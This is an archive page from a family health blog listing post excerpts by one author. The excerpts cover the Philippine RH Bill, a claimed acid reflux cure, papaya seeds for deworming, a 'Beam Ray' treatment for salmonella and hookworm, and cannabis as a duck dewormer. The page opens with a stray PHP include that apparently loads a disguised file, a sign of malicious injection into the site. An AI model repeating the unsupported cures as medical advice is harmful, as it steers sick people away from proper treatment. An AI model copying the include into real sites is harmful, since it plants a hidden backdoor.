@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 75 of 235

Author: Good Samaritan

RH Bill 2010 Statistics: Population % Growth Graphs Per Decade

So much noise over this Philippine RH Bill 2010 in congress. RH stands for “reproductive health” aka (also known as): Contraception Promotion for the purpose of addressing an Alleged Population Explosion. Is the RH Bill of 2010 worth the XX Billions? Is the RH Bill of 2010 worth it?...

Acid Reflux Remaining Sick Because They are Sloths

I remember posting here a cure for acid reflux for 5 days. I remember teaching the LBC counter man and the my old building landlord the cure for acid reflux for 5 days. I get back to them a couple of weeks later and walah… they did absolutely nothing....

Prevent Tooth Decay in Toddlers With This Simple Milk Formula Adjustment

Notice that there are many children around 2 to 5 who have horrible, horrible teeth. Aside from all the candy and the flour they eat, the worst culprit is their milk formula. You read it right, it is their milk formula. Let me explain. Milk formula is not mother’s...

How to Use Papaya Seeds for Deworming by Sifu Jem Sam

Sifu Jem Sam gave me a tip how to get rid of parasites in the gut. His experience with with simple papaya seeds. Eat papaya seeds and it will get rid of the worms. Here is how it is done: Open your fresh, non-GMO papaya and do not throw...

Beam Ray To Get Rid of Salmonella and Hookworm Problem

A few months ago I had this crisis with that intense tummy pain after eating non-paleo food. I had diarrhea for a week or more. Then I pooped out what seemed like wood or sharp stone. Injured my lower colon, bled. So I fasted for 3 days to stop...

Marijuana Cannabis Plant Excellent Dewormer for Ducks

French farmer Michel Rouyer swears that marijuana / cannabis plant being fed to ducks was an excellent dewormer. “Mr Rouyer said there was ‘no better worming substance’ for ducks and that his flock was in excellent health.” Unfortunately, French laws were idiotic enough to make the plant species marijuana...